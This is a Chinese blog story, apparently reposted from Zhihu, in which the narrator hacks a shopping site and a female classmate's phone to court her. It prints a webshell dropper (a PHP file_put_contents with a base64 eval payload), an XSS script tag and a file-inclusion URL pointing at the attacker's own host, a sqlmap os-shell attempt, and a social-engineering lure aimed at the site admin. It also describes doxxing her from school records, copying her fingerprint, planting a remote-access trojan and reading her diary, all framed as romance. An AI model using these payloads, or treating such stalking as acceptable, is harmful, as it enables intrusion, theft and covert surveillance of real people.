-=–=–=–=–=–=–=–=–=–=–=–=-
时间：早上8点02分(洛杉矶时间)
作者：gh0stkey
-=–=–=–=–=–=–=–=–=–=–=–=-文章前介：
主角：gh0stkey本人(化名:key)、国外留学学生(妹子)
导火线：带有印子的纸条
文章导读：
一张神秘的纸条出现在主角的生活之中，却让主角颠覆了”屌丝”的身份。纸条模样还原：

当时没想到要拍照，就借下网图。
内容简介：
事情是这样的，在一个阳光明媚的早晨，Key开始了老套的生活方式(洗脸刷牙..)上学去了。…中间省略上课不听讲的趣事。只听”叮铃铃”的下课铃，Key跟往常一样走出教室呼吸下新鲜的空气，可是意外的在走廊上发现了一张纸条。上面的内容大概是一串数字：1001…(大概就是10这两个数字重复的使用)。Key饶有兴趣的看了下，飞快的在大脑中找出了两种解决思路：二进制 摩斯电码。Key再进行思考，发现只有摩斯电码可行(这样与之匹配 1=滴 0=嗒 正好学校最近也教过摩斯电码)

（图1）

这样再进行一次转换(滴 = · 嗒 = -)然后对应图1进行解码，发现结果居然是个中国的手机号。

出于好奇，Key使用了一个手机号位置定位的系统进行了查询：

（位置仅供参考而已。估计手机卡在新疆。）

Key就在想自己班里是不是有一个就是新疆过来的？(其实就是在YY，是男的还是女的)。二话不说就动手把上次备份下来的同学信息档案调出来：

看到一个叫韩雨的，名字一看，果不其然是个妹子！(到这里Key的”屌丝”气质就显露无疑了)。开始进行人肉搜索，这里Key选择了Google进行搜索，先是搜索了”YuHan”的关键词，其实没有多少用处(名字太多找不到有用信息)。再进行手机号的搜索发现了一个网站:

居然搜索到了这个，进去了网站瞬间给跳转到了主页index.html。有经验的人就知道这个页面能被爬到，说明之前存在越权漏洞。(解释：因为一般个人页面，只自己登录才可以访问，这都被爬虫抓取了说明之前所有人都可以访问这个妹子的个人页面， 所以之前就存在了越权漏洞) 。但是到Key开始玩的时候就给修复了，Key顿时脸上就多了几条黑线。。。这彻底激发了Key的屌丝之魂，利用了Safe3进行了SQL注入的扫描 结果:

http://**********************/index.php?shop=17 可能存在SQL注入漏洞

虽然是爆出了可能存在，其实使用SQLMAP注入也是可以的。直接使用正常的语法就注入出来了：

Key看到数据量也是很大的，但并没有去Dump数据而是选择了温柔的方式：

–os-shell

可惜的是并没有权限去执行，无奈，只得继续挖掘其他的漏洞。通过一系列的测试挖到了一个XSS反射(这里的挖掘思路无非就是见参数就使用payload插进去然后看返回的信息进行构造)：

不过光一个XSS反射没有什么用，于是Key选择了代码审计这款程序，因为是一款开源的商城程序，很快就可以找到。Key直接使用Tommsearch快速搜索找到后台一处代码：

<?php

include($_GET[‘action’]);

….

明眼人直接可以看出来，存在文件包含漏洞。但是只是后台，该怎么办？于是Key就结合了XSS反射漏洞进行。Key在自己的主机上创建了个文件:1.php内容为：

<?php file_put_contents(‘key.php’,base64_decode(‘QGV2YWwoJF9QT1NUJiM5MTtrZXkmIzkzOyk7Pz4=’)); ?>
然后构建了xss反射的payload：

href.location=”/admin/ad.php?action=http://****.top/1.php”
(其实也可以直接发文件包含的链接，但是这样显得逼格的高，所以最后的xss链接就是http://**********.com/search.php?word=<script src=”http://****.top/1.js”>)

直接跳转到文件包含那个URL中然后包含Key的1.php文件这样就可以创建key.php木马文件了(一句话木马 也就是1.php的代码意思)。流程图：

这边利用的商品评价，发送我们构造的xss链接(内容：你这个商品出错了你看看链接：XSS链接)，迷惑下后台的人。OK这次渗透就到这里，Key顺利的拿下了Webshell：

之后Key得到了妹纸的买卖信息，其中步伐有胸罩购买！！(Key这时鼻血已经流出来了啦)。OK获取这些之后，Key整理了下文本就关机睡觉等待第二天去撩那个妹子(韩雨)。
。。。

第二天来到的如此之快，再去学校的路上Key碰见了上学以来对自己很照顾的同桌，并且知道了韩雨的模样(喷血喷血，好漂亮的)。走进了班级，Key东张西望，只见”清爽的头发，清秀的脸皮，清澈的眼眸”，没错就是韩雨！Key以不是很流利的英语跟韩雨打招呼，得来的却是：“我知道你是中国人，我们可以用中国话沟通的。”只听“啪啪啪啪”的响声，Key被打脸了，很疼。。。
经过跟妹子的交流，他们的关系似乎在慢慢的拉近，于是相约去吃牛排(这期间细节就不多讲，就是撩妹子)，由于有事情，妹子先走了。Key作为一名职业的“屌丝”！随身携带胶带纸是很有必要的，于是利用胶带纸小心翼翼的采集了西餐刀上的指纹(当时就想以后肯定会用到)：

顺利的保留下来之后，下面的才是有趣的。
。。。
又是过了几天，Key由于迟到被留下来罚打扫教室，发现韩雨的抽屉手机没带回去。Key试着打开手机可是有密码，也不知道，懒得用知道的信息做成密码攻击字典了，于是就用之前收集好的指纹信息顺利的解锁了手机，并且打开自己的网盘，种下了以前玩的安卓远控，安然无恙的放回了抽屉中。
。。。
终于，利用木马，Key有了妹子的正脸照：

Key也偷看了她的日记：

1

9.12号，今天有点累，闺蜜们都有男朋友安慰，突然觉得有男朋友真好。
这条日记 Key仿佛看到了希望！！于是Key利用木马来了一条提示消息：

这里已经慢慢的勾引了妹纸寂寞的心，只需要等第二天的实行。
。。。
第二天，Key直接当众表白(这里当然不能少了玫瑰花)，结果是成功了！表白内容：

Key：我喜欢你，对不起我入侵了你的手机，其实我是想入侵你的心，你愿意接受我吗？
妹纸(脸红 不知所措)：。。。

群众：Together，Together，Together！

最后就这样Key成功的逆袭了“屌丝”的身份，还约了妹纸出去次饭。

原文链接：https://zhuanlan.zhihu.com/p/22557286?refer=hi-ourlife